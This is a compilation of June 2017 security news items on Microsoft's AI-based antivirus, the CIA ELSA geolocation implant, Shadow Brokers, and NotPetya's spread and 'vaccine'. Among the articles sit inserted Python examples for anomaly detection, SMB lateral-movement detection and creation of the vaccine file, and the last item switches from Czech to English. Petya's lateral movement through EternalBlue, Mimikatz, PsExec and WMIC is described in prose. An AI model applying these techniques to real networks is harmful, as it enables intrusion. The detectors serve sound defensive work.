Microsoft Adding Artificial-Intelligence Based Advanced Antivirus to Windows 10
28.6.2017 thehackernews Safety
Microsoft is making every effort to make its Windows operating system more secure and advanced than ever before by beefing up its security practices and hardening it against hackers and cyber attacks in its next release.
With the launch of its Windows 10 Creators Update (also known as Redstone 3), which is expected to release sometime between September and October 2017, Microsoft is planning to ship a number of security features in an effort to prevent another major global malware crisis.
Just a few days ago, we reported about Microsoft's plan to build its EMET or Enhanced Mitigation Experience Toolkit into the kernel of the upcoming Windows 10 to boost the security of your computer against complex threats such as zero-day vulnerabilities.
Also, the tech giant has planned to remove the SMBv1 (Server Message Block version 1) — a 30-year-old file sharing protocol which came to light last month after the devastating WannaCry outbreak — from the upcoming Windows 10 (1709) Redstone 3 Update.
Now, Microsoft is turning to artificial intelligence (AI) to create the next generation of antivirus software.

Microsoft has revealed that its Windows Defender Advanced Threat Protection (ATP), a Windows 10 enterprise service that flags early signs of infection, will soon be augmented with AI-driven malware analysis.
"The stack will be powered by our cloud-based security intelligence, which moves us from a world of isolated defenses to a smart, interconnected, and coordinated defense grid that is more intelligent, simple to manage, and ever-evolving," Microsoft explains in a blog post.
In the Fall Creators Update for Windows 10, Microsoft will use a broad range of data from Redmond's cloud services, including Azure, Endpoint, and Office, to create an AI-driven antivirus that can pick up on malware behavior and protect other PCs running the operating system.
So, when a new file is discovered by Microsoft's anti-malware cloud service and determined to be malware, its signature will be created, and the AI system will then look for similar malware on other Windows PCs that have network connectivity.
It means this new AI-driven anti-malware system will eliminate the need for users and sysadmins to configure clients and servers to install local patches of antivirus signatures, stopping attacks as they happen and before they have an impact.

Microsoft told CNET that its upcoming update would rely on machine learning from more than 400 Million PCs running Windows 10 to prevent the next global malware crisis like WannaCry and Petya Ransomware attacks.
According to Rob Lefferts, Director of Windows Enterprise and Security, 96 percent of cyber-attacks involve new and zero-day malware, for which it takes the company hours to create signatures.
But the new AI system will significantly speed up that process by looking for instances of odd behavior within apps to detect an attack.
"If Word were to start allocating memory in big chunks when it never does, we would be able to detect that," Lefferts said. "We built the machine learning models around common applications like Word."
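As an added illustration, not Microsoft's code and not from the article, here is the simplest form of the behavioural baseline Lefferts describes: a per-application profile of allocation sizes, with any allocation far outside that profile flagged. The process name, the telemetry format and the sample events are constructed for the example; the robust median/MAD score and the threshold of 10 are assumptions.

```python
"""Per-application behavioural baseline for allocation sizes (added example).

Not Microsoft's detection model: a constructed illustration of flagging an
application that "starts allocating memory in big chunks when it never does".
"""
from collections import defaultdict
from statistics import median

# Constructed telemetry: (process name, allocation size in bytes).
# A clean window of Word activity used to learn the baseline ...
TRAINING_EVENTS = [
    ("WINWORD.EXE", 4096), ("WINWORD.EXE", 8192), ("WINWORD.EXE", 4096),
    ("WINWORD.EXE", 16384), ("WINWORD.EXE", 8192), ("WINWORD.EXE", 4096),
    ("WINWORD.EXE", 12288), ("WINWORD.EXE", 8192),
]
# ... and a live window containing one 256 MiB allocation never seen before.
LIVE_EVENTS = TRAINING_EVENTS + [("WINWORD.EXE", 268435456)]


def build_baseline(events):
    """Return {process: (median, MAD)} learned from a clean window.

    Median and median absolute deviation are used instead of mean/stddev so a
    few large training values cannot drag the baseline up.
    """
    sizes = defaultdict(list)
    for proc, size in events:
        sizes[proc].append(size)
    baseline = {}
    for proc, values in sizes.items():
        med = median(values)
        mad = median(abs(v - med) for v in values) or 1.0  # avoid a zero scale
        baseline[proc] = (med, mad)
    return baseline


def robust_score(baseline, proc, size):
    """How many MADs above its own median this allocation sits (None if unknown)."""
    if proc not in baseline:
        return None  # no profile yet: cannot judge, report separately
    med, mad = baseline[proc]
    return (size - med) / mad


def detect(events, baseline, threshold=10.0):
    """Return (process, size, score) for every event above the threshold."""
    hits = []
    for proc, size in events:
        score = robust_score(baseline, proc, size)
        if score is not None and score > threshold:
            hits.append((proc, size, round(score, 1)))
    return hits


if __name__ == "__main__":
    base = build_baseline(TRAINING_EVENTS)
    for proc, size, score in detect(LIVE_EVENTS, base):
        print(f"anomaly: {proc} allocated {size} bytes (score {score})")
```

A real model would profile far more than allocation size (call sequences, child processes, file and network activity), but the shape is the same: learn what an application normally does, then score departures from that rather than matching a signature of known malware.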
Besides this new upgrade, Windows Defender Advanced Threat Protection also includes some new features like browser-focused Application Guard and cloud-related Device Guard and Exploit Guard.


'Elsa' Tool Allows CIA to Locate Users via Wi-Fi

28.6.2017 securityweek  BigBrothers
WikiLeaks has published a document detailing “Elsa,” a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to track people’s locations via their laptop’s Wi-Fi.

According to its developers, Elsa provides geolocation data by recording the details of Wi-Fi access points, including signal strength, in range of the targeted Windows device. The user’s location and movements can be obtained after the data is sent to third-party location services.

Once Elsa is planted on the target’s computer, it monitors nearby Wi-Fi connections even if the device is not connected to the Internet. Once an Internet connection is available, the malware can send the collected Wi-Fi data to a database containing the geographical location of wireless access points.

The document made available by WikiLeaks showed that Elsa leveraged geolocation databases set up by Google and Microsoft.

The data is encrypted and logged, and the malware’s operator can manually retrieve this log by connecting to the infected device.

“The ELSA project allows the customization of the implant to match the target environment and operational objectives like sampling interval, maximum size of the logfile and invocation/persistence method,” WikiLeaks said. “Additional back-end software (again using public geo-location databases from Google and Microsoft) converts unprocessed access point information from exfiltrated logfiles to geo-location data to create a tracking profile of the target device.”


The user manual leaked by WikiLeaks as part of its Vault 7 dump is dated September 2013, which indicates that the tool may have been improved significantly if it’s still maintained by its developer.

WikiLeaks (@wikileaks) tweeted: "RELEASE: CIA 'ESLA' implant to track the location of laptops by intercepting the surrounding WiFi signals https://wikileaks.org/vault7/#Elsa"

Kyle Olbert (@realKyleOlbert) replied: "@wikileaks The #WiFi maps #Vault7 #ELSA appears to rely on have improved dramatically since 2013, theoretically making it far more precise today." (2:14 PM - 28 Jun 2017)

Earlier this month, WikiLeaks also published documents detailing tools allegedly used by the CIA to spread malware on a targeted organization’s network (Pandemic), hack routers and access points (Cherry Blossom), and hack air-gapped networks using USB drives (Brutal Kangaroo).

WikiLeaks has also detailed tools designed for replacing legitimate files with malware, hacking Samsung smart TVs and routers, MitM tools, a framework used to make malware attribution and analysis more difficult, and a platform for creating custom malware installers.

Security firms have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


UK's Metropolitan Police Still Using 10,000 Windows XP Computers

28.6.2017 securityweek  BigBrothers
Legacy Windows XP systems used by public authorities in the UK remain a concern. The WannaCry outbreak last month, followed by the current 'NotPetya' outbreak -- both using a vulnerability patched in newer versions of Windows, but initially unpatched in XP -- highlights the problem.

Information obtained by Steve O'Connell, a member of the London Assembly and a Conservative Party spokesperson for policing and crime, shows that the Metropolitan Police Service (MPS, or the Met) was still using 18,293 XP machines on their network at the time of providing the information. Since XP is no longer supported by Microsoft, it is left vulnerable to any new exploits such as EternalBlue and DoublePulsar -- and it appears that only the tendency for WannaCry to crash XP rather than infect it prevented the worldwide outbreak from being far worse than it was.

The Met's position is more precarious than implied by O'Connell's figures. Last month, the UK's data protection regulator, the ICO, published findings (PDF) from a consensual audit of the Met. While finding some areas of 'good practice', it also noted other areas in need of improvement.

In particular, one area for improvement includes the continued use of XP on some desktops and laptops leading to "a residual risk to personal data." But in relation to WannaCry and NotPetya, this risk is magnified by weaknesses in both the Met's backup and business continuity procedures. "Backup arrangements for file systems are not tested to ensure that they are recoverable in the event of a disaster."

Furthermore, "The database used to store BC information is unsupported and not backed up."

The ICO's conclusion was that "The audit has identified considerable scope for improvement in existing arrangements to reduce the risk of non-compliance [with the Data Protection Act]."

The combination of a vulnerable system and untested recovery capabilities is particularly susceptible to ransomware -- and even more so where the ransomware attacks are more intent on mischief than collecting ransoms, as seems to be the case with both WannaCry and NotPetya. The threat to, or potential loss of, personal data stored by the Metropolitan Police is particularly concerning.

"It is vital the Met is given the resources to step up its upgrade timeline before we see another cyber-attack with nationwide security implications," warns O'Connell. But, of course, things are never so simple. SecurityWeek reached out to the Met to confirm O'Connell's figures, and received the following statement:

"The MPS is undergoing a complete refresh of its information technology processes, infrastructure, and equipment - including its desktop computers.

"However, the upgrade programme is not as simple as it would be for many other organizations due to the amount of specialist legacy software upon which parts of the MPS still rely.

"Replacements or remediation for this software that are compatible with a more modern operating system have to be ready before the roll-out is completed to ensure continued operational effectiveness.

"We have completed the upgrade of just over 17,000 devices to Windows 8.1, and this reduces the number of desktops running Previous XP to around 10,000."

The spokesperson did not know, and was unable to find out in time for this article, whether the Met has patched all its Windows systems (not just the XP ones) against MS17-010 vulnerabilities (also known as the EternalBlue vulnerabilities) after the WannaCry outbreak. However, he did add, "The entire Met ICT estate has a number of layers of industry-leading security, which we have been monitoring closely over the past 24 hours. The MPS estate currently remains un-impacted by the cyber-attack and our security checks continue."

The complicating factor of legacy software on legacy systems is a problem, and not just for the Met. "I'm sympathetic to the fact that financially stretched government agencies and public services may not feel that an OS upgrade is the best use of scarce resources," independent security expert David Harley told SecurityWeek.

"Sometimes," he continued, "there are technical reasons for not upgrading a system required to run specific software or peripherals. There may be systems for which an OS upgrade is expected to damage functionality for other reasons, such as underpowered hardware. There are systems that may not require updating because they're fully air-gapped, I suppose. And the risk from running systems that can no longer be updated is sometimes overhyped: there's plenty of malware that doesn't rely on unpatched Windows versions to allow it to execute."

But none of this means that organizations can relax their efforts to upgrade XP systems. "Nonetheless," concluded Harley, "the risk of attack by malware that makes use of vulnerabilities in unpatched machines (such as the new Petya variant that apparently makes use of EternalBlue) is quite significant enough to make it unwise to rely on systems that are no longer normally updated, even if the agencies concerned are taking advantage of rare events like Microsoft's XP patch in May... After all, dangers to their data, systems and internal processes don't only affect their 'business' but all of us."

The bottom line is that 10,000 XP systems still in use by the Metropolitan Police Service is really 10,000 too many.


WikiLeaks Reveals How CIA Malware Tracks Geo-Location of its Targeted

28.6.2017 thehackernews BigBrothers

WikiLeaks has just published a new batch of the ongoing Vault 7 leak, and this time the whistleblowing website has unveiled a classified piece of malware that tracks the geolocation of targeted PCs and laptops running the Microsoft Windows operating system.
In short, the malware does it by capturing the IDs of nearby public hotspots and then matching them with the global database of public Wi-Fi hotspots’ locations.
Dubbed ELSA, the alleged CIA project consists of two main elements: the processing component (Operator Terminal) and the implant (Windows Target), which is deployed on a target Windows host.
Here's How the CIA's ELSA Malware Works
The Elsa system first installs the malware on a targeted WiFi-enabled machine using separate CIA exploits to gain persistent access on the device.
The malware then uses the Wi-Fi hardware of the infected computer to scan nearby visible Wi-Fi access points (APs) and records, at regular intervals, their ESSID (Extended Service Set Identifier, the IEEE 802.11 network name), MAC address and signal strength.
In order to perform this data collection, the ELSA malware does not require the targeted computer to be connected to the Internet. Instead, it only requires the malware to be running on a device with Wi-Fi enabled.
"If [the target device] is connected to the internet, the malware automatically tries to use public geo-location databases from Google or Microsoft to resolve the position of the device and stores the longitude and latitude data along with the timestamp," WikiLeaks notes.
The collected information is then stored in encrypted form on the targeted device for later exfiltration.
The CIA malware itself doesn't beacon (transfer) this data to the agency's server, instead, the operator (CIA hacker) downloads the encrypted log files from the device using separate CIA exploits and backdoors.
The operator then decrypts the log files and performs further analysis on their target.
The ELSA project allows CIA hackers to customize or modify the implant depending upon the target environment and operational objectives such as "sampling interval, the maximum size of the log file and invocation/persistence method."
The CIA hacker (operator) then uses additional back-end software to match collected access point data from exfiltrated log files with public geolocation databases (from Google and Microsoft) and finds the exact location of their target.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped an alleged CIA tool suite for Microsoft Windows, dubbed Brutal Kangaroo, that targets closed networks or air-gapped computers within an organization or enterprise without requiring any direct access.
Since March, the whistleblowing group has published 12 batches in the "Vault 7" series, which include this week's and last week's leaks, along with the following batches:
Cherry Blossom – A CIA framework, essentially a remotely controllable firmware-based implant, used to monitor the Internet activity of targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic – A CIA project that allowed the agency to turn Windows file servers into covert attack machines that silently infect other computers of interest inside a targeted network.
Athena – A CIA spyware framework designed to take full remote control of infected Windows PCs; it works against every version of Microsoft's Windows operating system, from Windows XP to Windows 10.
AfterMidnight and Assassin – Two apparent CIA malware frameworks for the Microsoft Windows platform, designed to monitor and report back actions on the infected remote host and to execute malicious actions.
Archimedes – A man-in-the-middle attack tool allegedly developed by the agency to target computers inside a Local Area Network (LAN).
Scribbles – Software supposedly designed to embed 'web beacons' into confidential documents, allowing the CIA to track insiders and whistleblowers.
Grasshopper – A framework that allowed the CIA to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.
Marble – Disclosed the source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter – Hacking exploits the CIA designed to target iPhones and Macs.
Weeping Angel – Spying tool used by the spy agency to infiltrate smart TV's, transforming them into covert microphones.
Year Zero – CIA hacking exploits for popular hardware and software.


'Shadow Brokers' Threaten to Dox Former NSA Hacker

28.6.2017 securityweek  BigBrothers
The Shadow Brokers has sent out its first round of exploits and data as part of a recently announced monthly subscription service, and the group claims it has a significant number of subscribers.

The hackers, who claim to possess exploits and secret documents stolen from the U.S. National Security Agency (NSA), particularly the Equation Group actor linked to the agency, announced last month that anyone could obtain parts of the data for a monthly fee of 100 Zcash (ZEC), which at the time was worth roughly $20,000.

The group announced on Wednesday its data dump for the month of June and said that they had “many many subscribers.” As a result, individuals and organizations that want next month’s files will have to pay double – 200 ZEC or 1,000 XMR (Monero).

The Shadow Brokers also announced that, following requests from several individuals, they have decided to launch a so-called “VIP Service.” Those who want the group’s attention – to learn if they have exploits for specific vulnerabilities or intel on a certain organization – have to make a one-time payment of 400 ZEC, which is currently worth roughly $130,000. The hackers claim someone has already signed up for the VIP service.

A significant part of the statement published on Wednesday by the Shadow Brokers is a message to an individual the hackers call “doctor.” This person, who they claim to have met on Twitter, sent the hackers some “ugly tweets” and later deleted them.

The hackers did some digging and they discovered that the “doctor” is a former member of the Equation Group and they believe he is responsible for building many tools and hacking organizations in China. They also claim that this individual is the co-founder of a new security company.

The Shadow Brokers told “doctor” that if he doesn’t sign up for their next monthly dump, they will dox him (i.e. expose his real identity).

“TheShadowBrokers is thinking this outcome may be having negative financial impact on new security companies international sales, so hoping ‘doctor’ person and security company is making smart choice and subscribe. But is being ‘doctor’ person's choice. Is not being smart choice to be making ugly tweets with enough personal information to DOX self AND being former equation group AND being co-founder of security company,” the Shadow Brokers said.

While many of the exploits leaked in the past months by the Shadow Brokers had little value, the recent WannaCry ransomware attacks demonstrated that the group’s leaks can lead to significant damage. The hackers’ requests for money were largely ignored until the WannaCry outbreak, but these attacks have made many realize that the group’s exploits can be highly valuable.

Some members of the infosec community decided to launch a crowdfunding initiative to acquire Shadow Brokers exploits via the monthly dump service in an effort to help prevent a future WannaCry-like incident, but they ultimately decided to cancel the project due to legal concerns.


Petya/NotPetya: What We Know in the First 24 Hours

28.6.2017 securityweek Ransomware
Petya/NotPetya Ransomware May Not be a Financially Motivated Attack, Researchers Say

The Petya/NotPetya outbreak that originated in Ukraine on Tuesday but spread globally within hours might have been more than a financially motivated ransomware incident, security researchers suggest.

The attack caught security researchers’ attention because the same EternalBlue SMB exploit employed by WannaCry was used to spread to new machines, and because of the fast pace at which reports of infections started to emerge worldwide.

The malware used in this attack, however, wasn’t WannaCry, but a variant of the Petya ransomware that first emerged in March 2016. Also referred to as Petya.A, Petrwrap, NotPetya, exPetr, and GoldenEye, this Petya variant features a different encryption algorithm implementation than before and is targeting different file types than previously observed variations.

While the exact number of victims isn’t known at the moment, Kaspersky Lab has already confirmed over 2,000 attacks, most of which occurred in Ukraine. During a phone call, Bitdefender’s senior e-threat analyst Bogdan Botezatu confirmed to SecurityWeek that Ukraine was hit the most: “We’ve seen some hits in other countries, but Ukraine was ravaged.”

The Petya/NotPetya attack hit a total of 65 countries, including Belgium, Brazil, Germany, Russia, and the United States, Microsoft reveals. In Ukraine, more than 12,500 machines were affected by the ransomware attack, the tech giant says.

The attack hit Ukraine central bank, government computers, airports, the Kiev metro, the state power distributor Ukrenergo, Chernobyl’s radiation monitoring system, and other machines in the country. It also affected Russian oil giant Rosneft, DLA Piper law firm, U.S. biopharmaceutical giant Merck, British advertiser WPP, and Danish shipping and energy company Maersk, among others.

Jury still out on initial infection vector

What Botezatu couldn’t confirm as of now was the initial infection vector. “We know how the ransomware moves within a network once it has compromised a machine, but we can’t find evidence of the initial infection vector,” he said.

While Microsoft and Cisco suggest that the legitimate updater process of tax accounting software MEDoc was compromised and used as the initial infection vector, the Ukrainian company has already denied the allegations [Ukrainian], and Bitdefender says they confirmed breaches in organizations that don’t use the software.

Kryptos Logic suggests that a zero-day vulnerability might have been used, given that Petya/NotPetya is limited to spreading only to computers in internal networks, and because a spam campaign wouldn’t be as effective.

“We believe to reach such a velocity, this can [be] accomplished by attacking update systems or software packages with 0-day vulnerabilities,” the company says.

Spam email was also considered a possibility, but “likely [wasn’t] responsible for the large number of public sector organizations hit in Ukraine,” a Kryptos Logic security researcher going by the name of MalwareTech says.

According to Costin Raiu, director of Global Research and Analysis Team at Kaspersky Lab, the website of Ukrainian City of Bahmut (Бахмут) might have been used as a secondary initial infection vector after being hacked and repurposed to serve the malware.

Encryption starts within an hour

The Petya/NotPetya variant used in this attack wouldn’t start encrypting infected computers immediately, but would wait for up to 60 minutes before doing so. However, given that the malware reboots the machine before starting the encryption, the delay window is supposedly used for credential gathering and network scanning operations.

“There appears to be a significant delay between running the malware and the beginning of the encryption process. Given that the malware reboots the machine, this is almost certainly to allow a reasonable amount of time to propagate across networks,” Forcepoint points out.

What fully set Petya/NotPetya apart from previous variants was the use of several tools for lateral movement. In addition to a modified EternalBlue exploit, the malware employs the EternalRomance exploit, Mimikatz for credential gathering, and WMIC (Windows Management Instrumentation Commandline) and PSExec for spreading within the compromised network.

The use of several tools allows the ransomware to compromise even up-to-date systems, and reports of companies that patched against EternalBlue but still got infected already emerged. As long as a single computer in the network is compromised, the malware can spread to the remaining ones, it seems.

“Once the ransomware has valid credentials, it scans the local network to establish valid connections on ports tcp/139 and tcp/445. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call DhcpEnumSubnets() to enumerate all hosts on all DHCP subnets before scanning for tcp/139 and tcp/445 services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with stolen credentials. It then tries to execute remotely the malware using either PSEXEC or WMIC tools,” Microsoft explains.
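The scanning behaviour Microsoft describes (one host opening connections to many internal hosts on tcp/139 and tcp/445 in quick succession) is something connection logs can be checked for. The following is an added example, not code from Microsoft or any vendor quoted in the article: it reads constructed connection-log lines in an assumed `src=… dst=… dport=…` format and flags any source that reaches at least five distinct SMB targets inside a sixty-second window. Both numbers are assumptions to be tuned per environment, and a legitimate file server or scanner should be whitelisted before alerting.

```python
"""Flag hosts fanning out over SMB (tcp/139, tcp/445) inside a short window.

Added example; the log format and the sample lines are constructed, and the
window and target thresholds are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+) proto=tcp$"
)
SMB_PORTS = {139, 445}

# Constructed sample: 10.0.1.5 talks repeatedly to one file server (normal);
# 10.0.1.23 touches seven different hosts on SMB ports within a few seconds.
SAMPLE_LOG = """\
2017-06-27T10:15:01Z src=10.0.1.5 dst=10.0.1.10 dport=445 proto=tcp
2017-06-27T10:15:03Z src=10.0.1.23 dst=10.0.1.40 dport=445 proto=tcp
2017-06-27T10:15:04Z src=10.0.1.23 dst=10.0.1.41 dport=139 proto=tcp
2017-06-27T10:15:04Z src=10.0.1.23 dst=10.0.1.41 dport=445 proto=tcp
2017-06-27T10:15:05Z src=10.0.1.23 dst=10.0.1.42 dport=445 proto=tcp
2017-06-27T10:15:06Z src=10.0.1.5 dst=10.0.1.10 dport=445 proto=tcp
2017-06-27T10:15:07Z src=10.0.1.23 dst=10.0.1.43 dport=445 proto=tcp
2017-06-27T10:15:08Z src=10.0.1.23 dst=10.0.1.44 dport=445 proto=tcp
2017-06-27T10:15:09Z src=10.0.1.23 dst=10.0.1.45 dport=445 proto=tcp
2017-06-27T10:15:10Z src=10.0.1.23 dst=10.0.1.46 dport=445 proto=tcp
2017-06-27T10:15:11Z src=10.0.1.23 dst=10.0.1.40 dport=80 proto=tcp
this line is malformed and must be skipped
2017-06-27T10:16:30Z src=10.0.1.5 dst=10.0.1.10 dport=445 proto=tcp
"""


def parse(line):
    """Return (timestamp, src, dst, dport) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["dst"], int(m["dport"])


def find_smb_fanout(lines, window_seconds=60, min_targets=5):
    """Return {src: peak number of distinct SMB targets} for sources that
    reached at least min_targets distinct hosts within window_seconds.

    Lines are assumed to be in time order; a sliding deque per source keeps
    only the events inside the current window.
    """
    recent = defaultdict(deque)  # src -> deque of (timestamp, dst)
    alerts = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, dst, dport = rec
        if dport not in SMB_PORTS:
            continue
        q = recent[src]
        q.append((ts, dst))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        distinct = {d for _, d in q}
        if len(distinct) >= min_targets:
            alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for src, count in find_smb_fanout(SAMPLE_LOG.splitlines()).items():
        print(f"possible SMB lateral movement from {src}: {count} targets in window")
```

The same sliding-window count can be fed from firewall, NetFlow or Windows Filtering Platform events; what matters for detecting this family is the number of distinct destinations per source on the SMB ports, not the volume of traffic.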

As soon as the encryption process starts, the machine is rebooted and the user is informed that the disk is being checked for errors. The same tactic was used by previous Petya variants: the malware would encrypt the Master Boot Record (MBR) while pretending to perform a check disk operation.

Petya/NotPetya uses an AES-128 key to encrypt all targeted files. It then encrypts the AES-128 key with the attacker’s public RSA-2048 key and saves it to a README file. Because both keys are securely generated, this solid encryption scheme prevents researchers from creating decryption tools for the malware, “unless a subtle implementation mistake has been made,” Kaspersky says.

Paying not an option to recover files

While this has been said over and over again, it can’t be truer than in Petya/NotPetya’s case: paying is by no means a valid option. The main reason for this is that the attacker no longer has access to the “wowsmith123456@posteo.net” email address listed in the ransom note.

Midway through Tuesday, soon after learning that the email address was being used as part of a malware attack, Posteo decided to block the account straight away. The action is part of the company’s policy of not tolerating the misuse of its platform.

“Since midday it is no longer possible for the blackmailers to access the email account or send emails. Sending emails to the account is no longer possible either,” Posteo notes in a blog post.

While this seems like a logical step to take when encountering email accounts used for nefarious purposes, Posteo’s action certainly did more to hurt victims than help them, as they can no longer contact the attackers to ask for the decryption keys in exchange for proof of payment.

The Bitcoin address the attackers ask victims to pay the ransom to already shows 43 transactions and 3.87408155 Bitcoin received, most probably in payments. Petya/NotPetya demands a $300 ransom from its victims.

Not a financially motivated attack

Despite using ransomware, the attack might not have been financially motivated, but rather aimed at data destruction or data theft, security researchers suggest.

“Many companies may be tempted to pay the ransom to get their systems back online. In this outbreak, it appears that the attackers never even attempted to be able to restore files to victims,” IBM’s Diana Kelley notes.

Bogdan Botezatu too notes that this campaign “might not have targeted financial gains but rather data destruction.” He further explains that the use of “a regular, non-bulletproof e-mail service provider,” is the first piece of evidence that the attackers weren’t really interested in getting paid.

Botezatu also told SecurityWeek that there are signs suggesting that the attack was initially targeted at specific companies, but became a global incident after getting out of hand.

He also cites “the lack of automation in the payment & key retrieval process” that “makes it really difficult for the attacking party to honor their end of the promise,” and the fact that the chosen payment confirmation option is rather difficult: “the user has to manually type an extremely long, mixed case “personal installation key” + “wallet” [which] is prone to typos.”

According to Recorded Future, there are reports that the Loki Bot information stealer might have been used in this attack as a secondary payload, suggesting that data theft could have been the purpose of the outbreak.

"Vaccine" available

Unlike the WannaCry outbreak, which was slowed down when a security researcher registered a kill-switch domain, no such option is available in Petya/NotPetya’s case. However, a vaccine is available, supposedly effective in preventing the ransomware from infecting compromised machines.

Discovered by Cybereason Principal Security Researcher Amit Serper, the vaccine involves the creation of a file named perfc (with no extension name) in the C:\Windows\ folder. Other security researchers also confirmed the finding.
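As an added example (not Cybereason's or Serper's own tooling), the following creates that marker file. The target directory is taken from the SystemRoot environment variable so the same logic can be exercised against a temporary folder on any OS; the file is also made read-only, which is an addition assumed here and not stated in the article.

```python
"""Create the NotPetya "vaccine" marker file (added example, not Cybereason's code)."""
import os
import stat
import tempfile
from pathlib import Path

MARKER_NAMES = ("perfc",)  # the file name reported in the article, no extension


def _base_dir(windows_dir):
    return Path(windows_dir or os.environ.get("SystemRoot", r"C:\Windows"))


def create_vaccine(windows_dir=None, names=MARKER_NAMES):
    """Create the marker file(s) in windows_dir and make them read-only.

    Returns the list of marker paths present afterwards. windows_dir defaults
    to %SystemRoot%; passing another directory lets the logic be exercised
    without touching a real system directory.
    """
    base = _base_dir(windows_dir)
    present = []
    for name in names:
        path = base / name
        if not path.exists():
            path.write_bytes(b"")  # zero-length file; the content is irrelevant
        # Strip write permission. On Windows this sets the ReadOnly attribute
        # (an assumption added here; the article only names the file).
        path.chmod(stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
        present.append(path)
    return present


def is_vaccinated(windows_dir=None, name="perfc"):
    """True when the marker exists as a regular, non-writable file."""
    path = _base_dir(windows_dir) / name
    if not path.is_file():
        return False
    return not (path.stat().st_mode & stat.S_IWUSR)


def self_check():
    """Exercise create/verify in a throwaway directory; True on success."""
    with tempfile.TemporaryDirectory() as tmp:
        before = is_vaccinated(tmp)
        created = create_vaccine(tmp)
        after = is_vaccinated(tmp)
        ok = (not before) and after and [p.name for p in created] == ["perfc"]
        # restore write permission so the temporary directory can be removed
        for p in created:
            p.chmod(stat.S_IWRITE | stat.S_IREAD)
    return bool(ok)


if __name__ == "__main__":
    # Read-only check against the real %SystemRoot%; create_vaccine() needs admin rights there.
    print("vaccine marker present:", is_vaccinated())
```

A marker file of this kind only stops the specific build that checks for it; it is no substitute for patching MS17-010, disabling SMBv1 and restricting administrative credentials that PsExec and WMIC can reuse.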


Microsoft released a batch of Windows fixes that some users may skip

28.6.2017 CNEWS.cz Vulnerabilities
On the other hand, there are never enough fixes, and this time a good many bugs were eliminated.

Outside of Patch Tuesday, Microsoft used to release updates only when the security situation called for it, and regular fix packages were delivered more often only to newer versions of Windows 10. Yesterday, i.e. 27 June, however, all supported versions of Windows 10 received their own fix packages. They were released two weeks after the regular Patch Tuesday. Why? Microsoft recently announced that it would release these fix packages ahead of Patch Tuesday.

Fix packages were also released for Windows 8.1 and 7, where they are explicitly labelled so that it is clear they are preview versions. Installing them is entirely optional. If you do not install the updates mentioned (in Windows 10 they will not be offered to you at all; see the tip in the sidebar), you will receive these fixes together with the security patches on 12 July at the earliest.

Update your Windows 10
Although the updates were released yesterday, it must have been during our late evening hours, because a few minutes after 9 p.m. Windows Update was not reporting anything new to me. Unlike the Patch Tuesday mentioned above, however, these are not updates that bring security patches. The following fix packages only improve the stability of the operating system, i.e. they fix discovered bugs. The new updates change the situation as follows:

Tip: If you have configured Windows Update to defer the installation of new features, Windows Update will not offer you any of these new updates. This option is only available in the Pro edition and higher.
update KB4022716 for Windows 10 v1703 raises the build number to 15063.447,
update KB4022723 for Windows 10 v1607 raises the build number to 14393.1378,
update KB4032693 for Windows 10 v1511 raises the build number to 10586.965,
update KB4032695 for Windows 10 v1507 raises the build number to 10240.17446.
The list of fixes for version 1703 is very long, but many problems were also fixed in version 1607. The two oldest versions of Windows 10 each get three fixes.


První ransomware existoval už v roce 1989. Největší neplechu způsobil WannaCry

28.6.2017 Novinky/Bezpečnost Viry
Škodlivý software, který omezuje nebo zabraňuje uživateli přístup k počítači nebo souborům a který v úterý ochromil počítače po celém světě, se obecně označuje jako ransomware (z anglického ransom - výkupné). Za obnovení přístupu totiž požaduje výkupné, zpravidla v digitálních měnách (často bitcoinech), aby se zamezilo možnosti vysledovat platbu.
První známý ransomware byl objeven v roce 1989 pod názvem „AIDS trojan“. Autorem byl Joseph Popp, jehož software prohlašoval, že určitému softwaru v počítači vypršela licence, zašifroval soubory na disku a vyžadoval po uživateli platbu ve výši 189 dolarů firmě PC Cyborg Corporation za odemknutí systému.

Popp byl následně prohlášen za duševně chorého, aby nemusel stanout před soudem. Slíbil příspěvky, které vydělal svým malwarem, na podporu výzkumu AIDS.

Výběr známých kybernetických útoků s použitím ransomwaru z posledních let (řazeno chronologicky):

WinLock – V srpnu 2010 ruské úřady zatkly deset osob napojených na ransomwarového červa známého jako WinLock. Bez použití šifrování zamezil přístupu do systému zobrazením pornografických obrázků a vyzval uživatele k zaslání prémiové textové zprávy za cenu okolo deseti dolarů. Za tuto zprávu uživatel získal kód, který mohl být použit k odemknutí počítače. Podvod zasáhl mnoho uživatelů v Rusku a v sousedních zemích, hackerská skupina údajně takto získala okolo 16 miliónů dolarů.

Reventon – Another ransomware began spreading in 2012. It displayed a warning on the screen that the user had used the computer for some kind of illegal activity, such as downloading unlicensed software or child pornography, and demanded a ransom to unblock it. It spread mainly in Western Europe and the USA. In February 2013, a Russian citizen alleged to have links to Reventon was arrested in Dubai; ten more people were arrested later.

CryptoWall or CryptoLocker – First recorded in September 2013. Since then, several thousand computers have been infected, first in English-speaking countries and later in other states. For releasing the key, the hackers in English-speaking countries most often demanded around 300 dollars or euros; in the Czech Republic it was usually around 10,000 crowns, or double that if payment was not made within the time limit.

Fusob – Another ransomware called Fusob spread to mobile phones from April 2015 to March 2016 and demanded a ransom of 100 to 200 dollars. Most affected users (around 40 percent) were in Germany, fewer in Britain and the USA.

